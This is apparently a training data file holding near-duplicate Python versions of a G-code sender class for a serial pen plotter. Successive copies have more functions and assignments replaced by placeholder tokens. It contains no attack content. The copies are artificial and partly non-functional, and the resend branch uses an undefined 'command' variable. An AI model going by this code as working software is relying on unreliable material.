response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\nPORT = '/dev/ttys005'\nSPEED = 4800.0\n\n\nclass GcodeSender(object):\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n <function token>\n <function token>\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n <function token>\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n <function token>\n", "<import token>\n<assignment token>\n\n\nclass GcodeSender(object):\n <assignment token>\n <assignment token>\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n 